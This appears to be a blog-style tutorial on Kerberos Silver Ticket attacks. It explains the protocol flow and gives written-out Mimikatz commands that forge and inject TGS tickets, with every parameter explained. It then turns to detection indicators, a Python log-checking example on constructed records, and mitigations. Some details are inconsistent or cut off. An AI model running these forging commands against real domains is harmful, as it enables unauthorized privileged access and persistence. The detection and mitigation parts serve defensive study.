Forge service ticket
- Technique to maintain persistence in an already compromised domain.
- A Silver Ticket is a forged Kerberos Ticket Granting Service (TGS) ticket.
- A Silver Ticket attack involves compromising credentials and abusing the design of the Kerberos protocol.
- A Silver Ticket only allows an attacker to forge ticket-granting service (TGS) tickets for specific services.
- TGS tickets are encrypted with the password hash of the service; therefore, if an adversary steals the hash of a service account, they can mint TGS tickets for that service.
- An attacker can create a Silver Ticket by cracking a computer account password and using it to create a fake authentication ticket. Kerberos lets a service accept a ticket it can decrypt without checking back with the KDC that the ticket was genuinely issued, which is what attackers exploit to create Silver Tickets.
Kerberos Authentication Flow
- 1. The password is converted to an NTLM hash; a timestamp is encrypted with that hash and sent to the KDC as the authenticator in the ticket-granting ticket (TGT) request.
- 2. The KDC checks the user information and creates the TGT.
- 3. The TGT is encrypted and delivered to the user. Only the KRBTGT account in the domain can open and read TGT data.
- 4. The user presents the TGT to the DC when requesting a TGS ticket. The DC opens the TGT and validates the PAC checksum: if the DC can open the ticket and the checksum checks out, the TGT is valid. The data in the TGT is effectively copied to create the TGS ticket.
- 5. The TGS is encrypted using the target service account's NTLM password hash and sent to the user.
- 6. The user connects to the server hosting the service and presents the TGS. The service opens the TGS ticket using its NTLM password hash.
How Silver Ticket Attacks Work
Silver Ticket Attacks are post-exploitation attacks. That means that a threat actor must already have compromised a target system in the environment before they can generate a Kerberos Silver Ticket.
- 1. Gather information about the domain, such as the domain name and domain security identifier (SID).
- 2. Obtain the DNS name under which the service principal name (SPN) for the targeted
- 3. Use Mimikatz to obtain the local NTLM password (or password hash) for the Kerberos service running on the compromised system.
- 4. Use Mimikatz to forge a Kerberos TGS.
kerberos::golden /user:Administrator /domain:karim.net /sid:S-1-5-21-750046758-1551849808-2392872301 /target:win10.karim.net /service:cifs /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /id:500 /groups:512 /ptt /startoffset:0 /endin:600 /renewmax:10080
- kerberos::golden: name of the module (there is no separate Silver module).
- /user: username for which the ticket is generated.
- /domain: domain name.
- /sid: SID of the domain.
- /target: target machine.
- /service: the SPN name of the service for which the TGS is to be created.
- /rc4: NTLM hash of the service account.
- /id, /groups: optional user RID (default 500) and groups (default 513 512 520 518 519).
- /ptt: injects the ticket into the current PowerShell process; omit it to save the ticket on disk instead.
- /startoffset: optional start offset from which the ticket is available (default 0).
- /endin: optional ticket lifetime in minutes (default is 10 years). The default AD setting is 10 hours = 600 minutes.
- /renewmax: optional ticket lifetime with renewal, in minutes (default is 10 years). The default AD setting is 7 days = 10080 minutes.
Well-known group RIDs:
- 512: Domain Admins
- 513: Domain Users
- 518: Schema Admins
- 519: Enterprise Admins
- 520: Group Policy Creator Owners
Getting a user’s SID
Create the silver ticket
kerberos::golden /user:Administrator /domain:karim.net /rc4:de26cce0356891a4a020e7c4957afc72 /target:domainAD.karim.com /sid:S-1-5-21-750046758-1551849808-2392872301 /service:CIFS /id:500 /ptt
List current tickets
Save the ticket to a file
kerberos::golden /user:Administrator /domain:karim.net /rc4:de26cce0356891a4a020e7c4957afc72 /target:domainAD.karim.com /sid:S-1-5-21-750046758-1551849808-2392872301 /service:CIFS /id:500
Inject in memory using mimikatz
Access domain controller
- The normal process of obtaining a TGS ticket involves asking a domain controller to generate one.
- After the client proves their identity, the domain controller will reply with a TGS encrypted with the service account password.
- Detecting Silver Tickets is only possible on the endpoint and involves examining TGS tickets (and the logon events they produce) for subtle signs of manipulation, such as usernames that don't exist and modified group memberships (added or removed).
- The Account Domain field is blank when it should be DOMAIN.
- The Account Domain field is the DOMAIN FQDN when it should be DOMAIN.
- Event ID 4624: Account Logon
- Event ID 4634: Account Logoff
- Event ID 4672: Admin Logon
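Added example (not from the original post) that applies the three indicators above to constructed 4624/4672 records: a blank Account Domain, an Account Domain written as the FQDN instead of the NetBIOS name, and a username that does not exist in the directory. The NetBIOS name KARIM, the known-user list and the sample records are assumptions made for this example.

```python
"""Toy detection pass for the Silver Ticket indicators listed above, run over
constructed 4624/4672 records written as key=value lines (not captured logs)."""
from collections import namedtuple

NETBIOS_DOMAIN = "KARIM"                              # assumed NetBIOS name of karim.net
KNOWN_USERS = {"administrator", "alice", "svc_sql"}   # constructed directory account list

# Constructed sample records; the 2nd and 3rd are shaped like silver-ticket logons.
SAMPLE_EVENTS = """\
EventID=4624 TargetUserName=alice TargetDomainName=KARIM LogonType=3 AuthenticationPackageName=Kerberos
EventID=4624 TargetUserName=Administrator TargetDomainName= LogonType=3 AuthenticationPackageName=Kerberos
EventID=4624 TargetUserName=ghostadmin TargetDomainName=karim.net LogonType=3 AuthenticationPackageName=Kerberos
EventID=4672 SubjectUserName=ghostadmin SubjectDomainName=karim.net
"""

Finding = namedtuple("Finding", "event_id user reason")

def parse_event(line):
    """Split 'key=value key=value ...' into a dict; an empty value (key=) is kept as ''."""
    return dict(token.split("=", 1) for token in line.split())

def check_event(ev, known_users=KNOWN_USERS, netbios=NETBIOS_DOMAIN):
    """Findings for one event: only Kerberos logons (4624) and privileged
    logons (4672) are examined; other events return an empty list."""
    eid = ev.get("EventID")
    if eid == "4624" and ev.get("AuthenticationPackageName") == "Kerberos":
        user, domain = ev.get("TargetUserName", ""), ev.get("TargetDomainName", "")
    elif eid == "4672":
        user, domain = ev.get("SubjectUserName", ""), ev.get("SubjectDomainName", "")
    else:
        return []
    findings = []
    if domain == "":                      # Account Domain blank
        findings.append(Finding(eid, user, "account domain blank"))
    elif domain.upper() != netbios:       # FQDN (or foreign domain) instead of NetBIOS name
        findings.append(Finding(eid, user, "account domain %r, expected %s" % (domain, netbios)))
    if user.lower() not in known_users:   # username that does not exist
        findings.append(Finding(eid, user, "user does not exist in directory"))
    return findings

def analyze(text):
    """Run check_event over every non-empty line of a key=value log dump."""
    return [f for line in text.splitlines() if line.strip()
            for f in check_event(parse_event(line))]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print("%s %-14s %s" % f)
```

The FQDN check is deliberately strict (anything other than the expected NetBIOS name is reported), so in a multi-domain forest the expected-name comparison must be widened before the rule is used on real event exports.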
Several mitigations exist that can make it harder for an adversary to compromise service account password hashes:
- Protect assets (especially the domain controller).
- The same mitigations as for Kerberoasting apply.
- Reduce administrative access to member workstations and servers to the least required.
- Remove end-user administrative privileges on member workstations.
- Adopt strong password hygiene practices for service accounts.
- Do not allow users to possess administrative privileges across security boundaries.
If a silver ticket is detected, several response actions can be taken:
- Activate the incident response process and alert the incident response team.
- Reset the password of the compromised service account.
I finished part 3 of Kerberos attacks today; wait for me in the next part.